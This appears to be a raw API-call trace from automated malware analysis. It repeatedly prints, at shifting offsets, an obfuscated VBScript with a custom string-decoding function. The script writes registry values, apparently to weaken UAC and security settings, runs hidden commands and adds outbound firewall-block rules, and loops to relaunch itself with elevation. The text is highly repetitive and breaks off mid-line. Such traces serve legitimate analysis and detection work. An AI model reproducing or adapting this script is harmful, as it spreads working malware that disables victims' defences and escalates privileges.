bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.970] wcsncmp (_String1="(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.970] wcsncmp (_String1="s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.970] wcsncmp (_String1="1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.970] wcsncmp (_String1=")-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 